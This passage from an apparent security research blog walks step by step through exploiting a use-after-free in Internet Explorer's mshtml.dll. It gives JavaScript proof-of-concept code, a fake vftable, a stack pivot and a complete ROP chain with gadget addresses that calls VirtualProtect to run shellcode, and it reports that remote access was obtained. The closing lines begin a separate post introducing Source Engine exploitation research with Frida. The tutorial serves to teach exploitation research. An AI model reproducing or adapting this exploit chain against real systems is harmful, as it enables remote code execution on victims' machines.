        if (i == 0x70/4-1)
        {
          vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
        }
        else
        {
          vftable+= unescape("\u4141\u4141");
        }
      }

      // This creates an array of strings that get pointers created to them by the values property of t:ANIMATECOLOR (so technically these will become an array of pointers to strings)
      // Just make sure that the strings are semicolon separated (the first element, which is our fake vftable, doesn't need to be prepended with a semicolon)
      // The first pointer in this array of pointers is a pointer to the fake vftable, constructed with the above for loops. Each ";vftable" string is prepended to the longer 0x70 byte fake vftable, which is the first pointer/DWORD
      for(i=0; i<25; i++)
      {
        vftable += ";vftable";
      }

      // Trigger the UAF
      var x  = document.getElementById("a");
      x.outerText = "";

      /*
      // Create a string that will eventually have 104 non-unicode bytes
      var fillAlloc = "\u4141\u4141";

      // Strings in JavaScript are in unicode
      // \u unescapes characters to make them non-unicode
      // Each string is also appended with a NULL byte
      // We already have 4 bytes from the fillAlloc definition. Appending 100 more bytes, 1 DWORD (4 bytes) at a time, compensating for the last NULL byte
      for (i=0; i < 100/4-1; i++)
      {
        fillAlloc += "\u4242\u4242";
      }

      // Create an array and add it as an element
      // https://www.corelan.be/index.php/2013/02/19/deps-precise-heap-spray-on-firefox-and-ie10/
      // DOM elements can be created with a property set to the payload
      var newElement = document.createElement('img');
      newElement.title = fillAlloc;
      */

      try {
        a = document.getElementById('anim');
        a.values = vftable;
      }
      catch (e) {};

  </script>
    <table>
      <tr>
        <div>
          <span>
            <q id='a'>
              <a>
                <td></td>
              </a>
            </q>
          </span>
        </div>
      </tr>
    </table>
ss
</html>

Let’s (for now) leave WinDbg configured as our postmortem debugger, and see what happens. Running the POC, we can see that the crash ensues, and the instruction pointer is pointing to 41414141.

Great! We can see that we have gained control over EAX by making our virtual function point to a ROP gadget that exchanges EAX into ESP! Recall earlier what was said about our fake vftable. Right now, this table is only 0x70 bytes in size, because we know our vftable from earlier indexed a function from offset 0x70. This doesn’t mean, however, we are limited to 0x70 total bytes. The only limitation we have is how much memory we can allocate to fill the chunk. Remember, this vftable is pointed to by a DWORD, created from the HTML+TIME method to allocate 26 total DWORDS, for a total of 0x68 bytes, or 104 bytes in decimal, which is what we need in order to control the freed allocation.

Knowing this, let’s add some “ROP” gadgets into our POC to outline this concept.

// Create the fake vftable of 70 DWORDS (70 "functions")
vftable = "\u4141\u4141";

for (i=0; i < 0x70/4; i++)
{
// This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
// which is now controlled by our own chunk
if (i == 0x70/4-1)
{
  vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
}
else
{
  vftable+= unescape("\u4141\u4141");
}
}

// Begin the ROP chain
rop = "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

Great! We can see that our crash still occurs properly, the instruction pointer is controlled, and we have added to our fake vftable, which is now located on the stack! In terms of exploitation strategy, notice there still remains a pointer on the stack that is our original xchg eax, esp instruction. Because of this, we will need to actually start our ROP chain after this pointer, since it already has been executed. This means that our ROP gadget should start where the 43434343 bytes begin, and the 41414141 bytes can remain as padding/a jump further into the fake vftable.

It should be noted that from here on out, I had issues with setting breakpoints in WinDbg with Internet Explorer processes. This is because Internet Explorer forks many processes, depending on how many tabs you have, and our code, even when opened in the original Internet Explorer tab, will fork another Internet Explorer process. Because of this, we will just continue to use WinDbg as our postmortem debugger for the time being, and making changes to our ROP chain, then viewing the state of the debugger to see our results. When necessary, we will start debugging the parent process of Internet Explorer and then WinDbg to identify the correct child process and then debug it in order to properly analyze our exploit.

We know that we need to change the rest of our fake vftable DWORDS with something that will eventually “jump” over our previously used xchg eax, esp ; ret gadget. To do this, let’s edit how we are constructing our fake vftable.

// Create the fake vftable of 70 DWORDS (70 "functions")
// Start the table with ROP gadget that increases ESP (Since this fake vftable is now on the stack, we need to jump over the first 70 "functions" to hit our ROP chain)
// Otherwise, the old xchg eax, esp ; ret stack pivot gadget will get re-executed
vftable = "\u07be\u74fb";                   // add esp, 0xC ; ret (74fb07be) (mshtml.dll)

for (i=0; i < 0x70/4; i++)
{
// This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
// which is now controlled by our own chunk
if (i == 0x70/4-1)
{
  vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
}
else if (i == 0x68/4-1)
{
  vftable += unescape("\u07be\u74fb");    // add esp, 0xC ; ret (74fb07be) (mshtml.dll) When execution reaches here, jump over the xchg eax, esp ; ret gadget and into the full ROP chain
}
else
{
  vftable+= unescape("\u7738\u7503");     // ret (75037738) (mshtml.dll) Keep perform returns to increment the stack, until the final add esp, 0xC ; ret is hit
}
}

// ROP chain
rop = "\u9090\u9090";             // Padding for the previous ROP gadget (add esp, 0xC ; ret)

// Our ROP chain begins here
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

What we know so far, is that this fake vftable will be loaded on the stack. When this happens, our original xchg eax, esp ; ret gadget will still be there, and we will need a way to make sure we don’t execute it again. The way we are going to do this is to replace our 41414141 bytes with several ret opcodes that will lead to an eventual add esp, 0xC ; ret ROP gadget, which will jump over the xchg eax, esp ; ret gadget and into our final ROP chain!

Rerunning the new POC shows us program execution has skipped over the virtual function table and into our ROP chain! I will go into detail about the ROP chain, but from here on out there is nothing special about this exploit. Just as previous blogs of mine have outlined, constructing a ROP chain is simply the same at this point. For getting started with ROP, please refer to these posts. This post will just walk through the ROP chain constructed for this exploit.

The first of the 8 43434343 DWORDS is in ESP, with the other 7 DWORDS located on the stack.

This is great news. From here, we just have a simple task of developing a 32-bit ROP chain! The first step is to get a stack address loaded into a register, so we can use it for RVA calculations. Note that although the stack changes addresses between each instance of a process (usually), this is not a result of ASLR, this is just a result of memory management.

Looking through mshtml.dll we can see there is are two great candidates to get a stack address into EAX and ECX.

pop esp ; pop eax ; ret

mov ecx, eax ; call edx

Notice, however, the mov ecx, eax instruction ends in a call. We will first pop a gadget that “returns to the stack” into EDX. When the call occurs, our stack will get a return address pushed onto the stack. To compensate for this, and so program execution doesn’t execute this return address, we simply can add to ESP to essentially “jump over” the return address. Here is what this block of ROP chains look like.

// Our ROP chain begins here
rop += "\ud937\u74e7";                     // push esp ; pop eax ; ret (74e7d937) (mshtml.dll) Get a stack address into a controllable register
rop += "\u9d55\u74c2";                     // pop edx ; ret (74c29d55) (mshtml.dll) Prepare EDX for COP gadget
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address form previous COP gadget
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX, which contains a stack address, into ECX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9365\u750c";                     // add esp, 0x18 ; pop ebp ; ret (750c9365) (mshtml.dll) Jump over parameter placeholders into ROP chain

// Parameter placeholders
// The Import Address Table of mshtml.dll has a direct pointer to VirtualProtect 
// 74c21308  77e250ab kernel32!VirtualProtectStub
rop += "\u1308\u74c2";                     // kernel32!VirtualProtectStub IAT pointer
rop += "\u1111\u1111";                     // Fake return address placeholder
rop += "\u2222\u2222";                     // lpAddress (Shellcode address)
rop += "\u3333\u3333";                     // dwSize (Size of shellcode)
rop += "\u4444\u4444";                     // flNewProtect (PAGE_EXECUTE_READWRITE, 0x40)
rop += "\u5555\u5555";                     // lpflOldProtect (Any writable page)

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\u9090\u9090";                     // Compensate for pop ebp instruction from gadget that "jumps" over parameter placeholders
rop += "\u9090\u9090";                     // Start ROP chain

After we get a stack address loaded into EAX and ECX, notice how we have constructed “parameter placeholders” for our call to eventually VirtualProtect, which will mark the stack as RWX, and we can execute our shellcode from there.

Recall that we have control of the stack, and everything within the rop variable is on the stack. We have the function call on the stack, because we are performing this exploit on a 32-bit system. 32-bit systems, as you can recall, leverage the __stdcall calling convention on Windows, by default, which passes function arguments on the stack. For more information on how this ROP method is constructed, you can refer to a previous blog I wrote, which outlines this method.

After running the updated POC, we can see that we land on the 90909090 bytes, which is in the above POC marked as “Start ROP chain”, which is the last line of code. Let’s check a few things out to confirm we are getting expected behavior.

Our ROP chain starts out by saving ESP (at the time) into EAX. This value is then moved into ECX, meaning EAX and ECX both contain addresses that are very close to the stack in its current state. Let’s check the state of the registers, compared to the value of the stack.

As we can see, EAX and ECX contain the same address, and both of these addresses are part of the address space of the current stack! This is great, and we are now on our way. Our goal now will be to leverage the preserved stack addresses, place them in strategic registers, and leverage arbitrary write gadgets to overwrite the stack addresses containing the placeholders with our actual arguments.

As mentioned above, we know that Internet Explorer, when spawned, creates at least two processes. Since our exploit additionally forks another process from Internet Explorer, we are going to work backwards now. Let’s leverage Process Hacker in order to see the process tree when Internet Explorer is spawned.

The processes we have been looking at thus far are the child processes of the original Internet Explorer parent. Notice however, when we run our POC (which is not a complete exploit and still causes a crash), that a third Internet Explorer process is created, even though we are opening this file from the second Internet Explorer process.

This, thus far, has been unbeknownst to us, as we have been leveraging WinDbg in a postmortem fashion. However, we can get around this by debugging just simply waiting until the third process is created! Each time we have executed the script, we have had a prompt to ask us if we want to allow JavaScript. We will use this as a way to debug the correct process. First, open up Internet Explorer how you usually would. Secondly, before attaching your debugger, open the exploit script in Internet Explorer. Don’t click on “Click here for options…”.

This will create a third process, and will be the last process listed in WinDbg under “System order”

Note that you do not need to leverage Process Hacker each time to identify the process. Open up the exploit, and don’t accept the prompt yet to execute JavaScript. Open WinDbg, and attach to the very last Internet Explorer process.

Now that we are debugging the correct process, we can actually set some breakpoints to verify everything is intact. Let’s set a breakpoint on “jump” over the parameter placeholders for our ROP chain and execute our POC.

Great! Stepping through the instruction(s), we then finally land into our 90909090 “ROP gadget”, which symbolizes where our “meaningful” ROP chain will start, and we can see we have “jumped” over the parameter placeholders!

From our current execution state, we know that ECX/EAX contain a value near the stack. The distance between the first parameter placeholder, which is an IAT entry which points to kernel32!VirtualProtectStub, is 0x18 bytes away from the value in ECX.

Our first goal will be to take the value in ECX, increase it by 0x18, perform two dereference operations to first dereference the pointer on the stack to obtain the actual address of the IAT entry, and then to dereference the actual IAT entry to get the address of kernel32!VirtualProtect. This can be seen below.

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\udfee\u74e7";                     // add eax, 0x18 ; ret (74e7dfee) (mshtml.dll) EAX is 0x18 bytes away from the parameter placeholder for VirtualProtect
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX into ECX (EDX still contains our COP gadget)
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the stack pointer offset containing the IAT entry for VirtualProtect
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

The above snippet will take the preserved stack value in EAX and increase it by 0x18 bytes. This means EAX will now hold the stack value that points to the VirtualProtect parameter placeholder. This value is also copied into ECX, and our previously used COP gadget is leveraged. Then, the value in EAX is dereferenced to get the pointer the stack address points to in EAX (which is the VirtualProtect IAT entry). Then, the IAT entry is dereferenced to get the actual value of VirtualProtect into EAX. ECX, which has the value from EAX inside of it, which is the pointer on the stack to the parameter placeholder for VirtualProtect is overwritten with an arbitrary write gadget to overwrite the stack address with the actual address of VirtualProtect. Let’s set a breakpoint on the previously used add esp, 0x18 gadget used to jump over the parameter placeholders.

Executing the updated POC, we can see EAX now contains the stack address which points to the IAT entry to VirtualProtect.

Stepping through the COP gadget, which loads EAX into ECX, we can see that both registers contain the same value now.

Stepping through, we can see the stack address is dereferenced and placed in EAX, meaning there is now a pointer to VirtualProtect in EAX.

We can dereference the address in EAX again, which is an IAT pointer to VirtualProtect, to load the actual value in EAX. Then, we can overwrite the value on the stack that is our “placeholder” for the VirtualProtect function, using an arbitrary write gadget.

As we can see, the value in ECX, which is a stack address which used to point to the parameter placeholder now points to the actual VirtualProtect address!

The next goal is the next parameter placeholder, which represents a “fake” return address. This return address needs to be the address of our shellcode. Recall that when a function call occurs, a return address is placed on the stack. This address is used by program execution to let the function know where to redirect execution after completing the call. We are leveraging this same concept here, because right after the page in memory that holds our shellcode is marked as RWX, we would like to jump straight to it to start executing.

Let’s first generate some shellcode and store it in a variable called shellcode. Let’s also make our ROP chain a static size of 100 DWORDS, or a total length of 100 ROP gadgets.

rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

// Placeholder for the needed size of our ROP chains
for (i=0; i < 0x500/4 - 0x16; i++)
{
rop += "\u9090\u9090";
}

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\u9191\u9191";

for (i=0; i < 0x396/4-1; i++)
{
shellcode += "\u9191\u9191"
}

This will create several more addresses on the stack, which we can use to get our calculations in order. The ROP variable is prototyped for 0x500 total bytes worth of gadgets, and keeps track of each DWORD that has already been put on the stack, meaning it will shrink in size dynamically as more gadgets are used up, meaning we can reliably calculate where our shellcode is on the stack without more gadgets pushing the shellcode further and further down. 0x16 in the for loop keeps track of how many gadgets have been used so far, in hexadecimal, and every time we add a gadget we need to increase this number by how many gadgets are added. There are probably better ways to mathematically calculate this, but I am more focused on the concepts behind browser exploitation, not automation.

We know that our shellcode will begin where our 91919191 opcodes are. Eventually, we will prepend our final payload with a few NOPs, just to ensure stability. Now that we have our first argument in hand, let’s move on to the fake return address.

We know that the stack address containing the now real first argument for our ROP chain, the address of VirtualProtect, is in ECX. This means the address right after would be the parameter placeholder for our return address.

We can see that if we increase ECX by 4 bytes, we can get the stack address pointing to the return address placeholder into ECX. From there, we can place the location of the shellcode into EAX, and leverage our arbitrary write gadget to overwrite the placeholder parameter with the actual argument we would like to pass, which is the address of where the 91919191 bytes start (a.k.a our shellcode address).

We can leverage the following gadgets to increase ECX.

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder

Don’t forget also to increase the variable used in our for loop previously with 4 more ROP gadgets (for a total of 0x1a, or 26). It is expected from here on out that this number is increase and compensates for each additional gadget needed.

After increasing ECX, we can see that the parameter placeholder’s address for the return address is in ECX.

We also know that the distance between the value in ECX and where our shellcode starts is 0x4dc, or fffffb24 in a negative representation. Recall that if we placed the value 0x4dc on the stack, it would translate to 0x000004dc, which contains NULL bytes, which would break out exploit. This way, we leverage the negative representation of the value, which contains no NULL bytes, and we eventually will perform a negation operation on this value.

So to start, let’s place this negative representation between the current value in ECX, which is the stack address that points to 11111111, or our parameter placeholder for the return address, and our shellcode location (91919191) into EAX.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative distance between the current value of ECX (which contains the fake return parameter placeholder on the stack) and the shellcode location into EAX 
rop += "\ufc80\uffff";                     // Negative distance described above (fffffc80)

From here, we will perform the negation operation on EAX, which will place the actual value of 0x4dc into EAX.

rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual distance to the shellcode into EAX

As mentioned above, we know we want to eventually get the stack address which points to our shellcode into EAX. To do so, we will need to actually add the distance to our shellcode to the address of our return parameter placeholder, which currently is only in ECX. There is a nice ROP gadget that can easily add to EAX in mshtml.dll.

add eax, ebx ; ret

In order to add to EAX, we first need to get distance to our shellcode into EBX. To do this, there is a nice COP gadget available to us.

mov ebx, eax ; call edi

We first are going to start by preparing EDI with a ROP gadget that returns to the stack, as is common with COP.

rop += "\u4d3d\u74c2";                     // pop edi ; ret (74c24d3d) (mshtml.dll) Prepare EDI for a COP gadget 
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address form previous COP gadget

After, let’s then store the distance to our shellcode into EBX, and compensate for the previous COP gadget’s return to the stack.

rop += "\uc0c8\u7512";                     // mov ebx, eax ; call edi (7512c0c8) (mshtml.dll) Place the distance to the shellcode into EBX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget

We know ECX current holds the address of the parameter placeholder for our return address, which was the base address used in our calculation for the distance between this placeholder and our shellcode. Let’s move that address into EAX.

rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the return address parameter placeholder stack address back into EAX

Let’s now step through these ROP gadgets in the debugger.

Execution hits EAX first, and the negative distance to our shellcode is loaded into EAX.

After the return to the stack gadget is loaded into EDI, to prepare for the COP gadget, the distance to our shellcode is loaded into EBX. Then, the parameter placeholder address is loaded into EAX.

Since the address of the return address placeholder is in EAX, we can simply add the value of EBX to it, which is the distance from the return address placeholder, to EAX, which will result in the stack address that points to the beginning of our shellcode into EAX. Then, we can leverage the previously used arbitrary write gadget to overwrite what ECX currently points to, which is the stack address pointing to the return address parameter placeholder.

rop += "\u5a6c\u74ce";                     // add eax, ebx ; ret (74ce5a6c) (mshtml.dll) Place the address of the shellcode into EAX
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for the fake return address, with the address of the shellcode

We can see that the address of our shellcode is in EAX now.

Leveraging the arbitrary write gadget, we successfully overwrite the return address parameter placeholder on the stack with the actual argument, which is our shellcode!

Perfect! The next parameter is also easy, as the parameter placeholder is located 4 bytes after the return address (lpAddress). Since we already have a great arbitrary write gadget, we can just increase the target location 4 bytes, so that the parameter placeholder for lpAddress is placed into ECX. Then, since the address of our shellcode is already in EAX, we can just reuse this!

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpAddress, with the address of the shellcode

As we can see, we have now taken care of the lpAddress parameter.

Next up is the size of our shellcode. We will be specifying 0x401 bytes for our shellcode, as this is more than enough for a shell.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x401 in EAX
rop += "\ufbff\uffff";                     // Value from above
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual size of the shellcode in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for dwSize, with the size of our shellcode

Similar to last time, we know we cannot place 0x00000401 on the stack, as it contains NULL bytes. Instead, we load the negative representation into EAX and negate it. We also know the dwSize parameter placeholder is 4 bytes after the lpAddress parameter placeholder. We increase ECX, which has the address of the lpAddress placeholder, by 4 bytes to place the dwSize placeholder in ECX. Then, we leverage the same arbitrary write gadget again.

Perfect! We will leverage the exact same routine for the flNewProcect parameter. Instead of the negative value of 0x401 this time, we need to place 0x40 into EAX, which corresponds to the memory constant PAGE_EXECUTE_READWRITE.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x40 (PAGE_EXECUTE_READWRITE) in EAX
rop += "\uffc0\uffff";             // Value from above
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual memory constraint PAGE_EXECUTE_READWRITE in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for flNewProtect, with PAGE_EXECUTE_READWRITE

Great! The last thing we need to to just overwrite the last parameter placeholder, lpflOldProtect, with any writable address. The .data section of a PE will have memory that is readable and writable. This is where we will go to look for a writable address.

The end of most sections in a PE contain NULL bytes, and that is our target here, which ends up being the address 7515c010. The image above shows us the .data section begins at mshtml+534000. We can also see it is 889C bytes in size. Knowing this, we can just access .data+8000, which should be near the end of the section.

The routine here is identical to the previous two ROP routines, except there is no negation operation that needs to take place. We simply just need to pop this address into EAX and leverage our same, trusty arbitrary write gadget to overwrite the last parameter placeholder.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place a writable .data section address into EAX for lpflOldPRotect
rop += "\uc010\u7515";             // Value from above (7515c010)
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpflOldProtect, with an address that is writable

Awesome! We have fully instrumented our call to VirtualProtect. All that is left now is to kick off execution by returning into the VirtualProtect address on the stack. To do this, we will just need to load the stack address which points to VirtualProtect into EAX. From there, we can execute an xchg eax, esp ; ret gadget, just like at the beginning of our ROP chain, to return back into the VirtualProtect address, kicking off our function call. We know currently ECX contains the stack address pointing to the last parameter, lpflOldProtect.

We can see that our current value in ECX is 0x14 bytes in front of the VirtualProtect stack address. This means we can leverage several dec ecx ; ret ROP gadgets to get ECX 0x14 bytes lower. From there, we can then move the ECDX register into the EAX register, where we can perform the exchange.

rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the stack address of VirtualProtect into EAX
rop += "\ua1ea\u74c7";                     // xchg esp, eax ; ret (74c7a1ea) (mshtml.dll) Kick off the function call

We can also replace our shellcode with some software breakpoints to confirm our ROP chain worked.

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\uCCCC\uCCCC";

for (i=0; i < 0x396/4-1; i++)
{
shellcode += "\uCCCC\uCCCC";
}

After ECX is incremented, we can see that it now contains the VirtualProtect stack address. This is then passed to EAX, which then is exchanged with ESP to load the function call into ESP! The, the ret part of the gadget takes the value at ESP, which is VirtualProtect, and loads it into EIP and we get successful code execution!

After replacing our software breakpoints with meaningful shellcode, we successfully obtain remote access!

Conclusion

I know this was a very long winded blog post. It has been a bit disheartening to see a lack of beginning to end walkthroughs on Windows browser exploitation, and I hope I can contribute my piece to helping those out who want to get into it, but are intimidated, as I am myself. Even though we are working on legacy systems, I hope this can be of some use. If nothing else, this is how I document and learn. I am excited to continue to grow and learn more about browser exploitation! Until next time.

Peace, love, and positivity :-)

Exploiting the Source Engine (Part 2) - Full-Chain Client RCE in Source using Frida

Reversing Engineering for the Soul

1 May 2021 at 00:00

Introduction

Hey guys, it’s been awhile. I have cool new information to share now that my bug bounty has finally gone through. This recent report contained a full server-to-client RCE chain which I’m proud of. Unlike my first submission, it links together two separate bugs to achieve code execution, one memory corruption and one infoleak, and was exploitable in all Source Engine 1 titles including TF2, CS:GO, L4D:2 (no game specific functionality required!). In this bug hunting adventure, I wanted to spice things up a bit, so I added some extra constraints to the bugs I found/used, as well as experimented using the Frida framework as a way to interface with the engine through Typescript.

Problems with SourceMod (since the last post)

If you read my last blog post, you knew that I was using SourceMod as a way to script up my local dedicated server to test bugs I found for validity. While auditing this time around, it was quickly apparent that most of the obvious bugs in any of the original Source 2013 codebases were patched already. But, without confirming the bugs as fixed myself, I couldn’t rule out their validity, so a lot of my initial time was just spent scripting up SourceMod scripts and testing. While SourceMod itself already has a pretty fleshed-out scripting environment, it still used the SourcePawn language, which is a bit outdated compared to modern scripting languages. In addition, adding any functionality that wasn’t already in SourceMod required you to compile C++ plugins using their plugin API, which was sometimes tedious to work with. While SourceMod was very functional overall, I wanted to find something better. That’s why I decided to try out Frida after hearing good things from friends who worked in the mobile space.

Frida? On Windows?

